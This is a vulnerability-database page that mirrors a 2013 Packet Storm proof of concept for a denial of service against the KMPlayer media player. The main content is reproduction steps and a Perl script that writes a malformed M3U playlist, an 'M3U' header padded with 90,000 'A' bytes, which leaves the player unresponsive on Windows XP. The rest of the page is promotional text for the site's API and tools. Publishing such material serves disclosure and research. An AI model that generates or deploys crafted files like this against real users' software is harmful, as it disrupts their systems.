Lucene search
K

KMPlayer 3.5.0.77 Denial Of Service

🗓️ 25 Jan 2013 00:00:00Reported by JigsawType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

KMPlayer (PlayList M3U) Denial Of Service PoC for All Versions on Window

Code
`Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions  
Author : Jigsaw (Abdelmorite Eljoaydi)  
Date : 26-01-2013  
E-mail : [email protected]  
Home : Morroco   
Facebook page : facebook.com/abdelmorit.alma  
platform : software  
Impact : Denial Of Service   
Tested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77  
OS : Tested on Windows XP SP1,SP2 and SP3 'Windows 7 is not Vulnerable' other OS maybe Vulnerable   
Risk : Low[+] / Medium[-]  
  
====How to reproduce====  
When creating a file with the poc below , you'll have to open the playlist file in kmplayer , a box will pop up just press OK . After that press the play button to trigger the DOS vulnerability . The program will not be able to respond until the process is killed using the task manager .  
  
=========Proof of concept===========  
#!/usr/bin/perl  
my $j = "\x41" x 90000;  
my $h = "\x4D\x33\x55";  
my $file = "kmplayer.m3u";  
open ($File, ">$file");  
print $File $h.$j;  
close ($File);  
====================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jan 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
28